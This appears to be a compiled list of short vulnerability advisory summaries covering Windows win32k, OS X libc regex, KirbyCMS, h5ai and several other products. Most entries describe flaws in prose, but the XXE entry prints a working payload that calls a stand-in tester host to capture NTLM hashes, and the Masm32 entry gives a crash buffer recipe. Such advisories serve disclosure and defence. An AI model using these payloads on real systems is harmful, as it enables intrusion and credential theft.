This vulnerability occurs when a user switches between two desktops of which one is closed. The testcase crashes with and without special pool enabled. The attached crash output is with special enabled on win32k.sys and ntoskrnl.sys.
The attached PoC triggers a blue screen due to a use after free vulnerability. The PoC is a zip file containing a proof of concept exploit for a use-after-free vulnerability in the Bitmap object. The exploit allows an attacker to write to arbitrary addresses, which can be used to execute arbitrary code.
A buffer overflow vulnerability exists in OS X Libc when used in enhanced mode (by passing the REG_ENHANCED flag to regcomp). The code blindly copies hex characters from the regex into the 32 byte stack buffer tmp until it encounters either a non-hex character or a '}'. This can be exploited to crash the application by passing a long string of hex characters to the regex.
The OS X regex engine function tre_tnfa_run_parallel contains the following code: int tbytes;...if (!match_tags) num_tags = 0; else num_tags = tnfa->num_tags;...int rbytes, pbytes, total_bytes; char *tmp_buf; /* Compute the length of the block we need. */ tbytes = sizeof(*tmp_tags) * num_tags; rbytes = sizeof(*reach_next) * (tnfa->num_states + 1); pbytes = sizeof(*reach_pos) * tnfa->num_states; total_bytes = (sizeof(long) - 1) * 4 /* for alignment paddings */ + (rbytes + tbytes * tnfa->num_states) * 2 + tbytes + pbytes; num_states and num_tags are computed based on the requirements of the regex and it's quite easy to make them each >64k with a relatively small regex. Note that total_bytes is an int and part of its calculation is the product of num_states and num_tags. The types here are all over the place and there's conversion between int, unsigned's and size_t. The attached PoC causes total_bytes to become negative leading to total_bytes being sign-extended in the memset call.
XML External Entity Injection vulnerability has been found in the XML parser in the System Administration->XML Content and Actions -> Import section. Example show how pentester is able to get NTLM hash of application's user. Content of file (PoC) : <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]><root/> When pentester has metasploit smb_capture module run, then application will contatc him and provide NTLM hash of user.
A directory traversal vulnerability exists in Konica Minolta FTP Utility, which allows an attacker to read arbitrary files on the vulnerable system. This is due to the application not properly validating user-supplied input, allowing an attacker to traverse the directory structure and read files outside of the intended directory. This vulnerability can be exploited by sending a specially crafted FTP request containing directory traversal characters (e.g. '../') to the vulnerable server.
A buffer overflow vulnerability exists in Masm32v11r which allows an attacker to crash the program by creating a file called MASM_crash.txt with a buffer of 4676 A's, 4 B's, 4 C's and 500 D's and then converting it to a script using the Quick Editor in Masm32.
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application. The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application.
h5ai is a popular web-based file indexer. Versions 0.22.0 - 0.24.1 are vulnerable to an unrestricted file upload vulnerability. An attacker can upload arbitrary files to the web server, which can lead to remote code execution.
KirbyCMS has a vulnerability that allows to bypass authentication in a hosting environment where users within the same shared environment can save/read files in a directory accessible by both the victim and the attacker. During the process, it fails to validate the resulting path to ensure that it does not contain path traversal sequences such as '../' within the login variable provided by a user.
Services By CQR